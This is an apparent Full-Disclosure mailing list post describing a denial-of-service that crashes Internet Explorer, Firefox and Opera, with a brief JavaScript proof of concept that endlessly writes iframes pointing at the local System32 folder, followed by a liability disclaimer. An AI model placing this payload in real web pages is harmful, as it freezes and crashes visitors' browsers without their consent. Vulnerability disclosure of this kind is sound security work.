[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] IE, Firefox, Opera DoS



Description
========

    Browser DoS through viewing of a malicious page that repeatedly loads 
iframes of C:\Windows\System32 using 100% cpu
    Crashes Mozilla Firefox, Latest Opera and IE - Opera gives the error "The 
address type is unknown or unsupported" and crashes

POC
===
<scr1pt language="JavaScript">
while(true) 
{
   document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>Discovered by MeFakon part of the su1d exploit development 
teamDISCLAIMER:

This advisory is meant only for the dissemination of information, alerting the
general public about a security issue. Use this information at your own
discretion.

In brief, the author is not responsible for any use, misuse, abuse of this
information. Also, this information is provided "as is" without any warranty of
any kind.